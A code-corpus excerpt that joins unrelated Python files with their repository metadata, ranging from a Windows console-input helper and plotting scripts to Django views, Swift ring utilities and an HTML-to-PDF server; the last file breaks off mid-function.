kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)]
else:
kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum)
#kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96)
#kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED
return kc
#win32console.AttachConsole()
coord = win32console.PyCOORDType
con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)
flags = win32process.NORMAL_PRIORITY_CLASS
si = win32process.STARTUPINFO()
si.dwFlags |= win32con.STARTF_USESHOWWINDOW
(handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si)
time.sleep(1)
#size = con_stdout.GetConsoleScreenBufferInfo()['Window']
# with codecs.open("log.txt", "w", "utf8") as f:
# for i in xrange(0, size.Bottom):
# f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i)))
# f.write("\n")
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 5554
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
(sc, scname) = s.accept()
while True:
msg = sc.recv(1)
if ord(msg) == 0:
break
keys = [make_input_key(msg)]
if keys:
con_stdin.WriteConsoleInput(keys)
win32process.TerminateProcess(handle1, 0)
|
gpl-2.0
| 1,044,929,001,205,104,300
| 26.846154
| 109
| 0.643157
| false
| 2.766878
| false
| false
| false
|
airanmehr/bio
|
Scripts/TimeSeriesPaper/Plot/topSNPs.py
|
1
|
1589
|
'''
Copyleft Oct 14, 2016 Arya Iranmehr, PhD Student, Bafna Lab, UC San Diego, Email: airanmehr@gmail.com
'''
import numpy as np;
np.set_printoptions(linewidth=200, precision=5, suppress=True)
import pandas as pd;
pd.options.display.max_rows = 20;
pd.options.display.expand_frame_repr = False
import seaborn as sns
import matplotlib as mpl
import os;
home = os.path.expanduser('~') + '/'
import Utils.Util as utl
import Scripts.TimeSeriesPaper.RealData.Utils as rutl
a = rutl.loadAllScores().groupby(level='h', axis=1).apply(rutl.HstatisticAll)
df = pd.read_pickle(utl.outpath + 'real/scores.df')
i = df.lrd.sort_values().index[-1]
df.loc[i]
cd = pd.read_pickle(utl.outpath + 'real/CD.F59.df')
import Utils.Plots as pplt
import pylab as plt
names = rutl.loadSNPIDs()
sns.set_style("white", {"grid.color": "0.9", 'axes.linewidth': .5, "grid.linewidth": "9.99"})
mpl.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']});
mpl.rc('text', usetex=True)
reload(pplt)
f, ax = plt.subplots(1, 2, sharey=True, dpi=300, figsize=(4, 2))
i = a[0.5].sort_values().index[-1]
sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2})
pplt.plotSiteReal(cd.loc[i], ax=ax[0], legend=True)
ax[0].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8)
i = df.lrdiff.sort_values().index[-1]
pplt.plotSiteReal(cd.loc[i], ax=ax[1])
sns.set_context("notebook", font_scale=1, rc={"lines.linewidth": 1.2})
ax[1].set_title('{}:{:.0f} ({})'.format(i[0], i[1], names.loc[i]), fontsize=8)
plt.gcf().subplots_adjust(bottom=0.2)
pplt.savefig('topSNPs', 300)
plt.show()
|
mit
| 2,218,888,666,753,329,700
| 32.104167
| 102
| 0.680302
| false
| 2.486698
| false
| true
| false
|
edx/edx-load-tests
|
util/generate_summary.py
|
1
|
3450
|
# -*- coding: utf-8 -*-
"""
Generate a summary of a previous loadtest run in this environment.
See for usage example in a jenkins job dsl:
https://github.com/edx/jenkins-job-dsl/blob/master/testeng/jobs/loadtestDriver.groovy
Prerequisites:
A logfile produced by util/run-loadtest.sh should be present in its
standard location.
Output:
Produces summary on standard output in YAML format. The structure is as
follows:
* monitoring_links:
* list of link text/url pairs pointing to monitoring dashboards.
* timeline:
* begin: ISO 8601 date for when the test began.
* end: ISO 8601 date for when the test ended.
"""
from datetime import timedelta
import yaml
import helpers.markers
from util.app_monitors_config import MONITORS
# Refer to util/run-loadtest.sh in case this file path changes.
STANDARD_LOGFILE_PATH = "results/log.txt"
def parse_logfile_events(logfile):
"""
Parse the logfile for events
Parameters:
logfile (file): the file containing locust logs for a single load test
Returns:
iterator of (datetime.datetime, str) tuples: the parsed events in the
order they are encountered.
"""
for line in logfile:
data = helpers.markers.parse_logfile_event_marker(line)
if data is not None:
yield (data['time'], data['event'])
def get_time_bounds(logfile):
"""
Determine when the load test started and stopped.
Parameters:
logfile (file): the file containing locust logs for a single load test
Returns:
two-tuple of datetime.datetime: the time bounds of the load test
"""
begin_time = end_time = None
relevant_events = ['locust_start_hatching', 'edx_heartbeat', 'quitting']
relevant_times = [
time
for time, event
in parse_logfile_events(logfile)
if event in relevant_events
]
begin_time, end_time = (min(relevant_times), max(relevant_times))
return (begin_time, end_time)
def main():
"""
Generate a summary of a previous load test run.
This script assumes "results/log.txt" is the logfile in question.
"""
with open(STANDARD_LOGFILE_PATH) as logfile:
loadtest_begin_time, loadtest_end_time = get_time_bounds(logfile)
monitoring_links = []
for monitor in MONITORS:
monitoring_links.append({
'url': monitor.url(
begin_time=loadtest_begin_time,
end_time=loadtest_end_time,
),
'text': u'{}: {} ({} — {})'.format(
monitor.monitoring_service_name,
monitor.app_name,
# We use naive datetimes (i.e. no attached tz) and just
# assume UTC all along. Tacking on the "Z" implies UTC.
loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
),
})
print(yaml.dump(
{
'timeline': {
'begin': loadtest_begin_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
'end': loadtest_end_time.strftime('%Y-%m-%dT%H:%M:%SZ'),
},
'monitoring_links': monitoring_links
},
default_flow_style=False, # Represent objects using indented blocks
# rather than inline enclosures.
allow_unicode=True,
))
if __name__ == "__main__":
main()
|
apache-2.0
| -6,008,860,902,320,476,000
| 30.345455
| 85
| 0.606729
| false
| 3.913734
| true
| false
| false
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/eventloop/coroutine.py
|
1
|
3783
|
from __future__ import unicode_literals
import types
from prompt_toolkit.eventloop.defaults import get_event_loop
from prompt_toolkit.eventloop.future import Future
__all__ = [
'From',
'Return',
'ensure_future',
]
def ensure_future(future_or_coroutine):
"""
Take a coroutine (generator) or a `Future` object, and make sure to return
a `Future`.
"""
if isinstance(future_or_coroutine, Future):
return future_or_coroutine
elif isinstance(future_or_coroutine, types.GeneratorType):
return _run_coroutine(future_or_coroutine)
else:
raise ValueError('Expecting coroutine or Future object. Got %r: %r' % (
type(future_or_coroutine), future_or_coroutine))
class Return(Exception):
"""
For backwards-compatibility with Python2: when "return" is not supported in
a generator/coroutine. (Like Trollius.)
Instead of ``return value``, in a coroutine do: ``raise Return(value)``.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
return 'Return(%r)' % (self.value, )
def From(obj):
"""
Used to emulate 'yield from'.
(Like Trollius does.)
"""
return ensure_future(obj)
def _run_coroutine(coroutine):
"""
Takes a generator that can yield Future instances.
Example:
def gen():
yield From(...)
print('...')
yield From(...)
ensure_future(gen())
The values which are yielded by the given coroutine are supposed to be
`Future` objects.
"""
assert isinstance(coroutine, types.GeneratorType)
loop = get_event_loop()
result_f = loop.create_future()
# Wrap this future in a `_FutureRef`. We need this in order to be able to
# break all its references when we're done. This is important
# because in case of an exception, we want to be sure that
# `result_f.__del__` is triggered as soon as possible, so that we see the
# exception.
# (If `step_next` had a direct reference to `result_f` and there is a
# future that references `step_next`, then sometimes it won't be cleaned up
# immediately. - I'm not sure how exactly, but in that case it requires the
# garbage collector, because refcounting isn't sufficient.)
ref = _FutureRef(result_f)
# Loop through the generator.
def step_next(f=None):
" Execute next step of the coroutine."
try:
if f is None:
new_f = coroutine.send(None)
else:
exc = f.exception()
if exc:
new_f = coroutine.throw(exc)
else:
new_f = coroutine.send(f.result())
except StopIteration:
# Stop coroutine. Make sure that a result has been set in the future,
# this will call the callbacks. (Also, don't take any result from
# StopIteration, it has already been set using `raise Return()`.
if not ref.future.done():
ref.future.set_result(None)
ref.forget()
except Return as e:
ref.future.set_result(e.value)
ref.forget()
except BaseException as e:
ref.future.set_exception(e)
ref.forget()
else:
# Process yielded value from coroutine.
assert isinstance(new_f, Future), 'got %r' % (new_f, )
@new_f.add_done_callback
def continue_(_):
step_next(new_f)
# Start processing coroutine.
step_next()
return result_f
class _FutureRef(object):
def __init__(self, future):
self.future = future
def forget(self):
" Forget reference. "
self.future = None
|
mit
| 911,875,866,142,147,300
| 29.02381
| 81
| 0.591594
| false
| 4.116431
| false
| false
| false
|
bhdouglass/remindor-common
|
tests/test_time_validation.py
|
1
|
1362
|
import remindor_common.datetimeutil as d
valid_singular = [
"now",
"1:00pm",
"1:00 pm",
"13:00",
"13",
"1300",
"1pm"
]
valid_repeating = [
"every hour",
"every hour from 1 to 1:00pm",
"every minute",
"every minute from 2:00pm to 1500",
"every 3 minutes",
"every 3 minutes from 3:30pm to 3:45 pm",
"every 2 hours",
"every 2 hours from 8 to 10"
]
invalid = [
"every minute from",
"asdf",
"every minutes to 3",
"2500",
"25",
"-1",
"every -2 minutes",
"every minute from 5 to 1",
"every minute from 5 to 5",
"8/12/13",
"October 12",
"7-21-2013"
]
print "testing valid singular times"
for row in valid_singular:
print "?" + row + "?"
value = d.str_time_simplify(row)
print "!" + str(value) + "!"
if value == None:
print "value should not be None!"
exit()
print ""
print "testing valid repeating times"
for row in valid_repeating:
print "?" + row + "?"
value = d.str_time_simplify(row)
print "!" + str(value) + "!"
if value == None:
print "value should not be None!"
exit()
print ""
print "testing invalid times"
for row in invalid:
print row
value = d.str_time_simplify(row)
print value
if value != None:
print "value should be None!"
exit()
|
gpl-3.0
| 4,687,957,397,284,547,000
| 18.73913
| 45
| 0.550661
| false
| 3.274038
| false
| false
| false
|
jokajak/itweb
|
data/env/lib/python2.6/site-packages/repoze.what-1.0.9-py2.6.egg/repoze/what/release.py
|
1
|
1208
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008-2009, Gustavo Narea <me@gustavonarea.net>
# All Rights Reserved.
#
# This software is subject to the provisions of the BSD-like license at
# http://www.repoze.org/LICENSE.txt. A copy of the license should accompany
# this distribution. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL
# EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND
# FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
repoze.what release information.
The version number is loaded to help the Quickstart plugin configure
repoze.what correctly, depending on the version available -- although it may
be useful on other packages.
"""
import os
_here = os.path.abspath(os.path.dirname(__file__))
_root = os.path.dirname(os.path.dirname(_here))
version = open(os.path.join(_root, 'VERSION.txt')).readline().rstrip()
# The major version: If version=='3.0.2rc4', the major version is int(3).
major_version = int(version.split('.')[0])
|
gpl-3.0
| -1,875,028,804,024,402,000
| 35.606061
| 78
| 0.639901
| false
| 3.947712
| false
| false
| false
|
picleslivre/schemaprobe
|
schemaprobe.py
|
1
|
2343
|
from __future__ import unicode_literals
import sys
import functools
import json
try:
import jsonschema
except ImportError:
jsonschema = None
try:
import requests
except ImportError:
requests = None
__version__ = '1.0.0.dev1'
__all__ = ['ensure', 'JsonProbe']
# --------------
# Py2 compat
# --------------
PY2 = sys.version_info[0] == 2
if PY2:
string_types = (str, unicode)
else:
string_types = (str,)
# --------------
class JsonProbe(object):
"""
An instance that knows how to perform validations against json-schema.
"""
_jsonschema = jsonschema
def __init__(self, schema):
"""
:param schema: json-schema as json-encoded text or python datastructures.
"""
if self._jsonschema is None:
raise TypeError('Missing dependency `jsonschema`.')
self.schema = self._normalize_input(schema)
def validate(self, input):
"""
Validate `input` agains the given schema.
:param input: json-encoded text or python datastructures.
:returns: boolean
"""
data = self._normalize_input(input)
try:
jsonschema.validate(data, self.schema)
except self._jsonschema.ValidationError:
return False
else:
return True
def _normalize_input(self, input):
"""
Always return python datastructures.
:param input: json-encoded text or python datastructures.
"""
if isinstance(input, string_types):
return json.loads(input)
else:
return input
def ensure(probe):
"""
Decorator that asserts the returned value is valid against `probe`.
"""
def ensure_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
result = f(*args, **kwargs)
if probe.validate(result):
return result
else:
raise TypeError('Returned data does not conform with the given schema.')
return wrapper
return ensure_decorator
class TestCaseMixin(object):
def assertSchemaIsValid(self, probe, resource_url, msg=None):
api_sample = requests.get(resource_url)
if not probe.validate(api_sample.json()):
raise self.failureException(msg or 'Schema is invalid.')
|
bsd-2-clause
| 1,664,159,037,023,619,000
| 23.154639
| 88
| 0.593683
| false
| 4.314917
| false
| false
| false
|
sighingnow/sighingnow.github.io
|
resource/k_nearest_neighbors/dating.py
|
1
|
3622
|
#! /usr/bin/env python
# -*- coding: utf-8
'''
Name: dating.py(KNN algorithm)
Training and test dataset: dating.txt
Created on Feb 8, 2015
@author: Tao He
'''
__author__ = 'Tao He'
from numpy import array as nmarray
from matplotlib import pyplot as plt
LABEL_MAP = {
'didntLike': 1,
'smallDoses': 2,
'largeDoses': 3,
}
ATTR_MAP = {
1: 'Number of frequent flyer miles earned per year',
2: 'Percentage of time spent playing video games',
3: 'Liters of ice cream consumed per week',
}
def create_dataset(filename=None):
''' Return data group and labels.
Get the data from file.
If the filename is not specialed, return None.
dataformat: flyerMiles, gameTime, icecream, label.
'''
def normalize_data(data=None):
''' Normalized dataset.
Normalize all data to range 0-1.
'''
if data is None:
return None
for column in range(data[0].__len__()):
max_val, min_val = max(data[:, column]), min(data[:, column])
for row in range(data.__len__()):
data[row][column] = (data[row][column]-min_val)/(max_val-min_val)
return data
if filename == None:
return (None, None)
group = []
labels = []
with open(filename, mode='r') as fp_data:
for line in fp_data:
group.append([float(num) for num in line[:-1].split('\t')[0:3]])
labels.append(LABEL_MAP[line[:-1].split('\t')[3]])
return normalize_data(nmarray(group)), labels
def draw_pic(group=None, labels=None, x=0, y=0):
''' Draw a subplot from data group.
'''
if group is None or labels is None:
return None
name = 'knn-dating'
figure = plt.figure(num=name, dpi=100)
ax_main = figure.add_subplot(1, 1, 1, xlabel=ATTR_MAP[x+1], ylabel=ATTR_MAP[y+1], title=name)
ax_main.scatter(group[:, x], group[:, y],
s=15*nmarray(labels),
c=[[i/LABEL_MAP.__len__()] for i in labels])
plt.show()
## plt.savefig('%s.png'%name, format='png', dpi=100)
def knn_classify(group, labels, attrs, ratio=0.5, item=0, k=3):
''' Return the type of item.
knn classify function.
'''
def get_dist(i, j):
''' Return the distence of group[i] and group[j].
'''
dist = 0.0
for attr in attrs:
dist += (group[i][attr]-group[j][attr])*(group[i][attr]-group[j][attr])
return dist
length = group.__len__()
distence = []
for i in range(int(length*ratio), length):
distence.append((i, get_dist(item, i)))
cnt = {}
distence.sort(key=lambda item: item[1])
for i in range(k):
label = labels[distence[i][0]]
if label in cnt:
cnt[label] += 1
else:
cnt[label] = 1
return sorted(cnt.items(), key=lambda item: item[1], reverse=True)[0][0]
def knn():
''' KNN classify algorithm.
'''
data, labels = create_dataset('dating.txt')
ratio, attr = 0.5, [0, 1, 2]
cnt, cnt_correct = 0, 0
length = data.__len__()
for i in range(0, int(length*ratio)):
cnt += 1
knn_type = knn_classify(data, labels, attr, ratio, i, 3)
# print('case[%d]: real: %d, knn: %d'%(i, labels[i], knn_type))
if knn_type == labels[i]:
cnt_correct += 1
print('total: %d, correct: %d, correct ratio: %f'%(cnt, cnt_correct, cnt_correct/cnt))
if __name__ == '__main__':
knn()
# vim: set sw=4, ts=4, fileencoding=utf-8
|
mit
| 8,461,827,833,393,829,000
| 27.933884
| 97
| 0.543622
| false
| 3.301732
| false
| false
| false
|
AYJAYY/KenoDB
|
keno.py
|
1
|
4245
|
# Keno Data Logging - QuickKeno
# KDL v1.5.2 - Python 3 Conversion
# Last Edit Date: 1/9/2021
from urllib.request import urlopen
import json
import time
def write_file(file_name, write_mode, file_text):
text_file = open(file_name, write_mode)
text_file.write(file_text)
text_file.close()
#get the keno json file
ma_keno_json = urlopen("http://www.masslottery.com/data/json/search/dailygames/todays/15.json")
#read from the json file
json_string = ma_keno_json.read()
#parse the json file so we can work with it
parsed_json = json.loads(json_string)
#get the min and max game and subtract them...
#...so we can get total number of games to iterate over
min_game = int(parsed_json['min'])
max_game = int(parsed_json['max'])
games = max_game - min_game
#script loop
while games > 0:
#get info from "draws" section in json file + create error log
orgOrder = parsed_json['draws'][games]['winning_num_org']
sortedOrder = parsed_json['draws'][games]['winning_num']
multiplier = parsed_json['draws'][games]['bonus']
multi_int = parsed_json['draws'][games]['bonus_value']
draw = parsed_json['draws'][games]['draw_id']
#split on dashes 19 times to split up the 20 numbers
orgOrder_split = orgOrder.split('-', 19)
#join the 20 numbers with commas to accomodate the csv
orgOrder_join = ",".join(orgOrder_split)
orgOrder_column = "\n".join(orgOrder_split)
#a way to string together the data using my "write file" function, this
#also turns everything into a string format so I can concatenate them.
long_text = str(orgOrder_join + "," + orgOrder + "," + sortedOrder + "," + multiplier + "," + multi_int + "," + draw) + "\n"
#also put the numbers in a single row for alternate file
single_row = str(orgOrder_column + "\n")
#write out to the files individually
try:
#format today's date for the filename and set it
date = time.strftime("%Y-%m-%d")
kenodbfile = "KenoFiles/Daily/kenodb" + str(date) + ".csv"
#write a new daily file
write_file(kenodbfile, "a+", long_text)
#append to the master file
write_file("KenoFiles/kenodbfull.csv", "a+", long_text)
#append to the single column file
write_file("KenoFiles/kenodbfull-1column.csv", "a+", single_row)
#in case the user is running on demand, give success messages & log them
print("Succesfully logged game #" + draw)
vlog_string = "<font size='1px'><strong>Succesfully logged game:</strong> " + draw + " <strong>|</strong> </font>" + "\n"
sys_log = "KenoFiles/SYSLOG.html"
write_file(sys_log,"a+",vlog_string)
except Exception as eW:
error_date_eW = time.strftime("%Y-%m-%d-%I:%M %p")
error_text_eW = str(eW) + " | " + "File Write Error" + " | " + error_date_eW + "<br \>" + "\n"
sys_log = "KenoFiles/SYSLOG.html"
log_html = "KenoFiles/LOG.html"
html_text = """<button type="button" class="btn btn-danger">An error has occured while writing to one of the files. Check the log in /KenoFiles</button><br \>""" + "\n"
write_file(sys_log,"a+",error_text_eW)
write_file(log_html,"a+",html_text)
print("An error has occured while writing to one of the files. Check the logs in /KenoFiles")
break
games = games - 1
#success - write to logs and print out in case this is an on demand run
games = max_game - min_game
success_date = time.strftime("%Y-%m-%d-%I:%M %p")
log_html = "KenoFiles/LOG.html"
sys_log = "KenoFiles/SYSLOG.html"
success_html = "<center><div class='bg-success' style='border:1px solid green;'><strong><font color='green'> KenoDB completed successfully" + " | " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Total Games: " + str(games) + "</font></strong></div></center><br \>" + "\n"
sys_success_html = """<button type="button" class="btn btn-success">KenoDB completed successfully""" + " | Date: " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Number Of Games: " + str(games) + "</button><br \>" + "\n"
write_file(log_html,"a+",sys_success_html)
write_file(sys_log,"a+",success_html)
print("KenoDB completed successfully")
|
gpl-3.0
| 8,259,616,565,052,512,000
| 47.793103
| 313
| 0.643816
| false
| 3.151448
| false
| false
| false
|
nephila/djangocms-blog
|
djangocms_blog/liveblog/migrations/0001_initial.py
|
1
|
2058
|
import django.db.models.deletion
import filer.fields.image
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("cms", "0013_urlconfrevision"),
("filer", "0003_thumbnailoption"),
]
operations = [
migrations.CreateModel(
name="Liveblog",
fields=[
(
"cmsplugin_ptr",
models.OneToOneField(
parent_link=True,
auto_created=True,
primary_key=True,
serialize=False,
to="cms.CMSPlugin",
on_delete=django.db.models.deletion.CASCADE,
),
),
("body", models.TextField(verbose_name="body")),
("publish", models.BooleanField(default=False, verbose_name="publish liveblog entry")),
(
"image",
filer.fields.image.FilerImageField(
related_name="djangocms_blog_liveblog_image",
on_delete=django.db.models.deletion.SET_NULL,
verbose_name="image",
blank=True,
to="filer.Image",
null=True,
),
),
(
"thumbnail",
models.ForeignKey(
related_name="djangocms_blog_liveblog_thumbnail",
on_delete=django.db.models.deletion.SET_NULL,
verbose_name="thumbnail size",
blank=True,
to="filer.ThumbnailOption",
null=True,
),
),
],
options={
"verbose_name": "liveblog entry",
"verbose_name_plural": "liveblog entries",
},
bases=("cms.cmsplugin",),
),
]
|
bsd-3-clause
| 3,167,827,842,490,844,700
| 33.881356
| 103
| 0.420797
| false
| 5.415789
| false
| false
| false
|
Mirantis/swift-encrypt
|
swift/common/ring/utils.py
|
1
|
2880
|
from collections import defaultdict
def tiers_for_dev(dev):
"""
Returns a tuple of tiers for a given device in ascending order by
length.
:returns: tuple of tiers
"""
t1 = dev['zone']
t2 = "{ip}:{port}".format(ip=dev.get('ip'), port=dev.get('port'))
t3 = dev['id']
return ((t1,),
(t1, t2),
(t1, t2, t3))
def build_tier_tree(devices):
"""
Construct the tier tree from the zone layout.
The tier tree is a dictionary that maps tiers to their child tiers.
A synthetic root node of () is generated so that there's one tree,
not a forest.
Example:
zone 1 -+---- 192.168.1.1:6000 -+---- device id 0
| |
| +---- device id 1
| |
| +---- device id 2
|
+---- 192.168.1.2:6000 -+---- device id 3
|
+---- device id 4
|
+---- device id 5
zone 2 -+---- 192.168.2.1:6000 -+---- device id 6
| |
| +---- device id 7
| |
| +---- device id 8
|
+---- 192.168.2.2:6000 -+---- device id 9
|
+---- device id 10
|
+---- device id 11
The tier tree would look like:
{
(): [(1,), (2,)],
(1,): [(1, 192.168.1.1:6000),
(1, 192.168.1.2:6000)],
(2,): [(2, 192.168.2.1:6000),
(2, 192.168.2.2:6000)],
(1, 192.168.1.1:6000): [(1, 192.168.1.1:6000, 0),
(1, 192.168.1.1:6000, 1),
(1, 192.168.1.1:6000, 2)],
(1, 192.168.1.2:6000): [(1, 192.168.1.2:6000, 3),
(1, 192.168.1.2:6000, 4),
(1, 192.168.1.2:6000, 5)],
(2, 192.168.2.1:6000): [(2, 192.168.2.1:6000, 6),
(2, 192.168.2.1:6000, 7),
(2, 192.168.2.1:6000, 8)],
(2, 192.168.2.2:6000): [(2, 192.168.2.2:6000, 9),
(2, 192.168.2.2:6000, 10),
(2, 192.168.2.2:6000, 11)],
}
:devices: device dicts from which to generate the tree
:returns: tier tree
"""
tier2children = defaultdict(set)
for dev in devices:
for tier in tiers_for_dev(dev):
if len(tier) > 1:
tier2children[tier[0:-1]].add(tier)
else:
tier2children[()].add(tier)
return tier2children
|
apache-2.0
| -1,470,004,698,661,708,500
| 31.359551
| 71
| 0.365625
| false
| 3.794466
| false
| false
| false
|
murdej/h2pws
|
h2pws.py
|
1
|
2618
|
import time
import BaseHTTPServer
from urlparse import urlparse, parse_qs
import subprocess
import base64
import qrcode
import qrcode.image.svg
import cStringIO
#1630-1800
HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS!!!
PORT_NUMBER = 8000 # Maybe set this to 9000.
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write("<html><head><title></title></head>")
s.wfile.write("<body><p>Send html source by POST.</p>")
# s.wfile.write("<p>You accessed path: %s</p>" % s.path)
s.wfile.write("</body></html>")
def do_POST(s):
"""Respond to a POST request."""
s.send_response(200)
s.send_header("Content-type", "application/x-pdf")
s.end_headers()
# params
url_params = parse_qs(urlparse(s.path).query)
args = ["wkhtmltopdf"]
for n in [ 'orientation', 'page-size', 'margin-bottom', 'margin-left', 'margin-right', 'margin-top' ]:
if n in url_params:
args += [ '--' + n, url_params[n][0] ]
args += ["-", "-"]
print args
html = s.rfile.read(int(s.headers.getheader('content-length')))
# Replace "qr::xxxxxxxxxxxxxxxxx" to sql qr code
if "qr-to-svg" in url_params :
new_html = ''
pos = 0
while True:
begin_str = '"qr::'
pos_a = html.find(begin_str, pos)
if pos_a == -1: break
# copy text before
new_html += html[pos:pos_a]
# extract src of QR code
pos_a += len(begin_str)
pos_b = html.find('"', pos_a + 1)
qr_src = html[pos_a:pos_b]
print "qr:src='" + qr_src + "'"
# new_html += '[[' + qr_src + ']]'
factory = qrcode.image.svg.SvgPathImage
img = qrcode.make(qr_src, image_factory=factory)
output = cStringIO.StringIO()
img.save(output)
svgb = 'data:image/svg+xml;base64,' + base64.b64encode(output.getvalue())
output.close()
new_html += svgb
pos = pos_b
new_html += html[pos:]
html = new_html
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(html)
p.stdin.close()
s.wfile.write(p.stdout.read())
p.wait()
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
|
gpl-2.0
| 4,676,818,734,918,425,000
| 26
| 104
| 0.637128
| false
| 2.8
| false
| false
| false
|
texib/bitcoin-zoo
|
member/views.py
|
1
|
3349
|
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from django.contrib.auth import login
from django.contrib.auth import logout
from django.contrib.auth import authenticate
from django.http import HttpResponseRedirect
from rest_framework import viewsets
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from serializer import UserSerializer, GroupSerializer
from rest_framework import status
from rest_framework import parsers
from rest_framework import renderers
from rest_framework_jwt import utils
from rest_framework_jwt.authentication import JSONWebTokenAuthentication as jwt_auth
from rest_framework_jwt.serializers import JSONWebTokenSerializer
# userena
from userena import views
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
authentication_classes = (BasicAuthentication, )
queryset = User.objects.all()
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
def signup(request):
'''
a simple overwritten the signup view
'''
return views.signup(request, success_url='/home/')
def signout(request):
'''
'''
return views.signout(request, template_name='home.html')
def signin(request):
'''
'''
# this is a little trick to hack the userena signin function
return views.signin(request, redirect_signin_function=lambda *arg: '/home/')
class testSignin(APIView):
'''
API View that receives a POST with a user's username and password.
Returns a JSON Web Token that can be used for authenticated requests.
'''
throttle_classes = ()
permission_classes = ()
authentication_classes = ()
parser_classes = (parsers.FormParser, parsers.JSONParser,)
renderer_classes = (renderers.JSONRenderer,)
serializer_class = JSONWebTokenSerializer
jwt = jwt_auth()
def post(self, request):
'''
a known issue now...
a segment fault happens if you login and then logout and login again..
'''
serializer = testSignin.serializer_class(data=request.DATA)
if serializer.is_valid():
payload = utils.jwt_decode_handler(serializer.object['token'])
user = self.jwt.authenticate_credentials(payload)
# below is a tric for authenticate..
# due to the authentication in django -- it need username and password,
# however, decode of jwt doesn't contain password.
user.backend = 'django.contrib.auth.backends.ModelBackend'
# user = authenticate(username=user, nopass=True)
if user is not None:
if user.is_active:
login(request, user)
return HttpResponseRedirect('/home/')
else:
raise Exception('user not active')
else:
raise Exception('not valid user')
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
|
mit
| -4,012,741,038,384,615,400
| 30.299065
| 84
| 0.693341
| false
| 4.550272
| false
| false
| false
|
dnowatsc/Varial
|
varial/operations.py
|
1
|
23334
|
"""
Operations on wrappers
"""
import array
import __builtin__
import ctypes
import collections
import functools
from ROOT import THStack, TGraphAsymmErrors
import history
import wrappers
class OperationError(Exception): pass
class TooFewWrpsError(OperationError): pass
class TooManyWrpsError(OperationError): pass
class WrongInputError(OperationError): pass
class NoLumiMatchError(OperationError): pass
def iterableize(obj):
if isinstance(obj, collections.Iterable):
return obj
else:
return [obj]
def add_wrp_kws(func):
"""Pops 'wrp_kws' from given keywords and updates returned wrapper."""
@functools.wraps(func)
def catch_wrp_kws(*args, **kws):
wrp_kws = kws.pop('wrp_kws', {})
ret = func(*args, **kws)
ret.__dict__.update(wrp_kws)
return ret
return catch_wrp_kws
@add_wrp_kws
@history.track_history
def stack(wrps):
"""
Applies only to HistoWrappers. Returns StackWrapper.
Checks lumi to be equal among all wrappers.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1,4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 4.5)
>>> h2.Fill(1,3)
1
>>> h2.Fill(3,6)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=2.)
>>> w3 = stack([w1, w2])
>>> w3.histo.Integral()
13.0
>>> w3.lumi
2.0
"""
wrps = iterableize(wrps)
stk_wrp = None
lumi = 0.
info = None
sample = ""
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper): # histo check
raise WrongInputError(
"stack accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if not stk_wrp: # stack init
stk_wrp = THStack(wrp.name, wrp.title)
lumi = wrp.lumi
info = wrp.all_info()
sample = wrp.sample
elif lumi != wrp.lumi: # lumi check
raise NoLumiMatchError(
